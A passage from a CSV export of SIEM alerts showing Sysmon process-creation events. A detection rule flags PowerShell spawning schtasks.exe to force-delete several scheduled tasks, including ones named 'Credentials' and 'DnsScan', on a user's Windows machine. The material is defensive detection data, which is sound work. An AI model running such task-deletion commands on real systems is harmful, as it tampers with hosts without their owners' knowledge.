2020 @ 14:20:05.073",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.643 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010df082c00} +ProcessId: 7260 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HispDemorn /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.645488300Z"",""eventRecordID"":""3336"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.643\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010df082c00}\r\nProcessId: 7260\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.643"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010df082c00}"",""processId"":""7260"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HispDemorn /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:05.037",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.621 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010b5062c00} +ProcessId: 7336 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN werclpsyport /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.623770400Z"",""eventRecordID"":""3335"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.621\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010b5062c00}\r\nProcessId: 7336\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.621"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010b5062c00}"",""processId"":""7336"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN werclpsyport /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:05.029",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.597 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00100e042c00} +ProcessId: 360 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN TablteInputout /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.599158100Z"",""eventRecordID"":""3334"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.597\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00100e042c00}\r\nProcessId: 360\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:34.597"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-00100e042c00}"",""processId"":""360"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN TablteInputout /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:05.015",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.572 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010d8012c00} +ProcessId: 3816 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Credentials /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.577354600Z"",""eventRecordID"":""3333"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.572\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010d8012c00}\r\nProcessId: 3816\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 
6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.572"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010d8012c00}"",""processId"":""3816"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Credentials /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.999",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.549 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00109cff2b00} +ProcessId: 7332 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN WebServers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.552524100Z"",""eventRecordID"":""3332"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.549\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00109cff2b00}\r\nProcessId: 7332\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: 
Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.549"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-00109cff2b00}"",""processId"":""7332"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WebServers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.985",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.523 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00107afd2b00} +ProcessId: 4312 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsScan /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.525472300Z"",""eventRecordID"":""3331"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.523\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00107afd2b00}\r\nProcessId: 4312\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" 
/Delete /TN DnsScan /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.523"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-00107afd2b00}"",""processId"":""4312"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsScan /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 
